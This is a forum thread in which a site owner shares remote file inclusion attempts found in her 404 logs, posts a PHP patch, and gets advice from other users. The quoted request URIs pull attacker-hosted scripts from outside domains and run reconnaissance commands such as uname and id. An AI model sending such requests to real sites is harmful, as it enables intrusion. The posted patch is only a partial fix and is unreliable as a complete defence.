Safe mode exploit

sarahk

This might be old news to many of you but it's new to me...

I was chugging through some 404 reports today and spotted this:

REQUEST_URI: /includes/include_once.php?include_file=http://ad0.8bit.co.uk/cse.gif?&cmd=pwd;uname%20-a;id

I took a look at the script, and even ran it from another site and found that it's trying to look for vulnerabilities.

The script it's asking for is common in CMS and carts. It tries to find info and to write to the shell.

If you have a script called include_once.php I would recommend changing it to something like this

<? 
if (substr($include_file,0,4)!='http') 
{ 
   //original code 
   if (!defined($include_file . '__')) 
   { 
       define($include_file . '__', 1); 
      include($include_file); 
   } 
   //end of original code 
} 
else include '/home/sitename/public_html/404.php'; 
?>

He's also been asking for

REQUEST_URI: /modules/My_eGallery/public/displayCategory.php?basepath=http://www.ka0ticl4b.hpgvip.com.br/cse.jpg?&cmd=id

REQUEST_URI: /modules/4nAlbum/public/displayCategory.php?basepath=http://www.ka0ticl4b.hpgvip.com.br/cse.jpg?&cmd=echo%20newbie

Any other ideas?

Sarah

kender

hmm.. i would avoid the filename include_once.php, i never name a page after a line of code, confusing it is

planetsim

This is fairly old, doing some searches would have brought up a few users that have had this happen to them. Nice that you displayed a fix for others.

Also as old as these attacks are they are still working on some very insecure websites.

Weedpacket

I prefer not to accept any such path information from the client. They should have no reason to need to know my directory structure or what I call my files; that's my responsibility. For any information coming in from the outside world, I treat it as though I did not write it.